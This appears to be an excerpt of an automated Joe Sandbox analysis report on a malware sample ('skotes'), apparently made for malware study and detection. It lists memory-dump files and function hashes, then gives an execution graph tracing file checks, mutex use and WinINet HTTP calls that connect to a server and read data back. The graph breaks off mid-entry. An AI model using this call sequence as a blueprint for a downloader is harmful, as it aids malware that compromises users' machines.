                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 8228372e7f1823fa7547f2ac521edb7dcbdce4f722c614bb51ff90e3dba09765
                                                                                                                                            • Instruction ID: c78abd18146b405014904a534d6377f5a181abcf340bd7fd6a62c63c99619fe4
                                                                                                                                            • Opcode Fuzzy Hash: 8228372e7f1823fa7547f2ac521edb7dcbdce4f722c614bb51ff90e3dba09765
                                                                                                                                            • Instruction Fuzzy Hash: CE217C317102089BEB189B6CED89B7CF7A1DBE1318F20825DE518DB7E5C77599808352
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                            • Instruction ID: dd109dc12240b70ca7c1ee05780473a8cbffe9368e155d1aac5b8166fb406241
                                                                                                                                            • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                            • Instruction Fuzzy Hash: EAB1153290464D9FDB15CFAAC9817BEBBF5EF45360F1441AAFA45EB241D6348E02CB60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mtx_unlock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1418687624-0
                                                                                                                                            • Opcode ID: 01acaf19bacc28ee09a046355a6bfc923d9dd9bb471a36b9ffd4858dde9a6b9b
                                                                                                                                            • Instruction ID: eb7c28b0b5b1bbdbecee3cc7ccf9ea19b329fc4fb1868db2240b4385ebd16c06
                                                                                                                                            • Opcode Fuzzy Hash: 01acaf19bacc28ee09a046355a6bfc923d9dd9bb471a36b9ffd4858dde9a6b9b
                                                                                                                                            • Instruction Fuzzy Hash: 90A1B0B2A012069FDF20DB64C945B9AB7A8FF15324F15826EE816D7341EB31EA04CBD1

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:5.7%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:761
                                                                                                                                            Total number of Limit Nodes:34
                                                                                                                                            execution_graph 37327 ace62d 37328 ace63b Concurrency::details::ContextBase::GetArbitraryAlias 37327->37328 37355 ace83e Concurrency::details::_CancellationTokenState::_RegisterCallback 37328->37355 37450 ad7a00 37328->37450 37330 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37332 aceb19 37330->37332 37331 ace7cb 37333 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37331->37333 37485 ac5c10 37332->37485 37335 ace7e0 37333->37335 37338 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37335->37338 37336 aceb21 37492 ad83c0 37336->37492 37340 ace7f2 37338->37340 37339 aceb36 37500 ad8220 37339->37500 37461 acbe30 37340->37461 37343 aceb45 GetFileAttributesA 37351 aceb62 37343->37351 37344 ace7fe 37346 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37344->37346 37347 ace813 37346->37347 37348 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37347->37348 37349 ace82b 37348->37349 37350 ac5c10 4 API calls 37349->37350 37352 ace832 37350->37352 37354 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37351->37354 37508 ac8580 37352->37508 37356 aced60 37354->37356 37355->37330 37363 acea8f Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37355->37363 37357 ac5c10 4 API calls 37356->37357 37358 aced68 37357->37358 37359 ad83c0 RtlAllocateHeap 37358->37359 37360 aced7d 37359->37360 37361 ad8220 RtlAllocateHeap 37360->37361 37362 aced8c GetFileAttributesA 37361->37362 37365 aceda9 37362->37365 37367 acf699 Concurrency::details::ContextBase::GetArbitraryAlias 37365->37367 37368 acf6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 37365->37368 37514 ad80c0 37365->37514 37369 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37368->37369 37370 acf727 37369->37370 37371 ac5c10 4 API calls 37370->37371 37372 acf72e 37371->37372 37373 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37372->37373 37374 acf741 37373->37374 37375 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37374->37375 37376 acf756 37375->37376 37377 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37376->37377 37378 acf76b 37377->37378 37379 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37378->37379 37380 acf77d 37379->37380 37527 ace530 12 API calls 3 library calls 37380->37527 37382 acf786 37383 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37382->37383 37384 acf7aa 37383->37384 37385 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37384->37385 37386 acf7ba 37385->37386 37387 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37386->37387 37388 acf7d7 37387->37388 37389 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37388->37389 37391 acf7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37389->37391 37390 acf982 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37391->37390 37392 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37391->37392 37393 acfa04 37392->37393 37394 ac5c10 4 API calls 37393->37394 37395 acfa0b 37394->37395 37396 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37395->37396 37397 acfa1e 37396->37397 37398 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37397->37398 37399 acfa33 37398->37399 37400 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37399->37400 37401 acfa48 37400->37401 37402 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37401->37402 37403 acfa5a 37402->37403 37528 ace530 12 API calls 3 library calls 37403->37528 37405 acfb35 Concurrency::details::ContextBase::GetArbitraryAlias 37406 acfa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 37406->37405 37407 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37406->37407 37408 acfba5 37407->37408 37529 ac9580 4 API calls 3 library calls 37408->37529 37410 acfbb4 37530 ac9230 4 API calls 3 library calls 37410->37530 37412 acfbc3 37531 ad8320 37412->37531 37414 acfbdb 37414->37414 37415 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37414->37415 37416 acfc8c 37415->37416 37417 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37416->37417 37418 acfca7 37417->37418 37419 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37418->37419 37420 acfcb9 37419->37420 37421 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37420->37421 37422 ad05d4 37421->37422 37423 ac5c10 4 API calls 37422->37423 37424 ad05db 37423->37424 37425 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37424->37425 37426 ad05f1 37425->37426 37427 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37426->37427 37428 ad0609 37427->37428 37429 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37428->37429 37430 ad0621 37429->37430 37431 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37430->37431 37432 ad0633 37431->37432 37535 ace530 12 API calls 3 library calls 37432->37535 37434 ad0880 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37435 ad063c Concurrency::details::_CancellationTokenState::_RegisterCallback 37435->37434 37436 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37435->37436 37437 ad0987 37436->37437 37438 ac5c10 4 API calls 37437->37438 37439 ad098e 37438->37439 37440 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37439->37440 37441 ad09a4 37440->37441 37442 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37441->37442 37443 ad09bc 37442->37443 37444 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37443->37444 37445 ad09d4 37444->37445 37446 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37445->37446 37447 ad12e0 37446->37447 37536 ace530 12 API calls 3 library calls 37447->37536 37449 ad12e9 37451 ad7a26 37450->37451 37452 ad7a2d 37451->37452 37453 ad7a81 37451->37453 37454 ad7a62 37451->37454 37452->37331 37458 add3e2 ListArray RtlAllocateHeap 37453->37458 37460 ad7a6f 6 library calls 37453->37460 37455 ad7ab9 37454->37455 37456 ad7a69 37454->37456 37545 ac2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37455->37545 37537 add3e2 37456->37537 37458->37460 37460->37331 37462 acc281 37461->37462 37463 acbe82 37461->37463 37464 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37462->37464 37463->37462 37465 acbe96 Sleep InternetOpenW InternetConnectA 37463->37465 37466 acc22e Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37464->37466 37467 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465->37467 37466->37344 37468 acbf18 37467->37468 37469 ac5c10 4 API calls 37468->37469 37470 acbf23 HttpOpenRequestA 37469->37470 37474 acbf4c Concurrency::details::ContextBase::GetArbitraryAlias 37470->37474 37472 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37473 acbfb4 37472->37473 37475 ac5c10 4 API calls 37473->37475 37474->37472 37476 acbfbf 37475->37476 37477 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37476->37477 37478 acbfd8 37477->37478 37479 ac5c10 4 API calls 37478->37479 37480 acbfe3 HttpSendRequestA 37479->37480 37483 acc006 Concurrency::details::ContextBase::GetArbitraryAlias 37480->37483 37482 acc08e InternetReadFile 37484 acc0b5 __InternalCxxFrameHandler 37482->37484 37483->37482 37551 ac5940 37485->37551 37489 ac5c6a 37570 ac4b30 37489->37570 37491 ac5c7b Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37491->37336 37584 ad7760 37492->37584 37494 ad8439 37496 ad8454 __InternalCxxFrameHandler 37494->37496 37596 ad8f40 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37494->37596 37499 ad84a8 __InternalCxxFrameHandler 37496->37499 37597 ad8f40 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37496->37597 37498 ad84ee 37498->37339 37499->37339 37501 ad8248 37500->37501 37502 ad8292 37500->37502 37501->37502 37503 ad8251 37501->37503 37507 ad82a1 __InternalCxxFrameHandler 37502->37507 37605 ad8f40 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37502->37605 37600 ad9280 37503->37600 37506 ad825a 37506->37343 37507->37343 37509 ac85d5 Concurrency::details::ContextBase::GetArbitraryAlias 37508->37509 37513 ac86a0 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37508->37513 37510 ac8767 37509->37510 37511 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37509->37511 37509->37513 37607 ad8200 RtlAllocateHeap 37510->37607 37511->37509 37513->37355 37516 ad80de __InternalCxxFrameHandler 37514->37516 37518 ad8104 37514->37518 37516->37365 37517 ad81f3 37609 ac2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37517->37609 37520 ad817d 